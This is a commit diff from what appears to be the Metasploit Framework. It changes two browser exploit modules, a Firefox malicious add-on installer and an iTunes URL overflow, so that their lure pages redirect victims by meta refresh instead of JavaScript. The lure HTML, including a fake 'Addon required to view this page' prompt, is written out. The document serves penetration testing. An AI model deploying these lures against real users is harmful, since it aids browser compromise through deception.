Addresses #8674

This type of redirection will work without javascript being enabled. Modules: multi/browser/firefox_xpi_bootstrapped_addon multi/browser/itms_overflow More info on the meta element: https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
2017-08-30 23:16:46 -05:00 · 2017-08-30 23:16:46 -05:00 · 49173818fd
parent 202c936868
commit 49173818fd
2 changed files with 7 additions and 4 deletions
--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@ -65,9 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def generate_html
-    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
+    html  = %Q|<html><head><title>Loading, Please Wait...</title>\n|
+    html << %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|
    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
-    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
    html << %Q|</body></html>|
    return html
  end
--- a/modules/exploits/multi/browser/itms_overflow.rb
+++ b/modules/exploits/multi/browser/itms_overflow.rb
@ -98,11 +98,14 @@ class MetasploitModule < Msf::Exploit::Remote
    # Return back an example URL.  Using an iframe doesn't work with all
    # browsers, but that's easy enough to fix if you need to.
    return String(<<-EOS)
-<html><head><title>iTunes loading . . .</title></head>
+<html>
+<head>
+<title>iTunes loading . . .</title>
+<meta http-equiv="refresh" content="0; url='#{itms_base_url}'">
+</head>
 <body>
 <p>iTunes should open automatically, but if it doesn't, click to
 <a href="#{itms_base_url}">continue</a>.</p>
-<script>document.location.assign("#{itms_base_url}");</script>
 </body>
 </html>
 EOS